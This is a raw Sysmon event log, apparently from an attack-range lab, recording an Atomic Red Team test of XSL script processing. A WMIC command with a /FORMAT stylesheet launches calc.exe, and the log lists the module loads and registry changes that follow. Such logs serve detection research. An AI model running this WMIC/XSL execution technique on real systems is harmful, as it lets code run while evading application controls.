12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057348935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057348934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057348933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057348932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXEMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EAtrueMicrosoft WindowsValid 734700x800000000000000057348931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057348930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057348929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057348928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 11241100x800000000000000057348927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 734700x800000000000000057348926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 12241200x800000000000000057348925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 23542300x800000000000000057348924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8452F19282FC626752F1F079B9449565,SHA256=5E486CD9E05D382FBDF861B6C6F1C5FEEF79FE1FCF2B19B49A952440A252DD12falsetrue 734700x800000000000000057348923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057348922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057348921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057348920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057348919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057348918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057348917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057348916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 734700x800000000000000057348915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 12241200x800000000000000057348914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 12241200x800000000000000057348912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 12241200x800000000000000057348910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348905Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348904Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 12241200x800000000000000057348900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValid 12241200x800000000000000057348894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057348892Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057348891Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348890Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348889Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348888Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348887Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348886Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348885Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.920{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348884Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.920{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057348883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.904{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}46569912C:\Windows\System32\Wbem\WMIC.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+89d2f|C:\Windows\System32\windows.storage.dll+899a5|C:\Windows\System32\windows.storage.dll+89496|C:\Windows\System32\windows.storage.dll+8a908|C:\Windows\System32\windows.storage.dll+892be|C:\Windows\System32\windows.storage.dll+8c0d5|C:\Windows\System32\windows.storage.dll+8c454|C:\Windows\System32\windows.storage.dll+8ba90|C:\Windows\System32\SHELL32.dll+3cd3f|C:\Windows\System32\SHELL32.dll+3cbcc|C:\Windows\System32\SHELL32.dll+dcb6e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057348881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.918{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exewmic process list /FORMAT:"C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl" 12241200x800000000000000057348880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 13241300x800000000000000057348879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057348878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057348877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057348876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 12241200x800000000000000057348875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 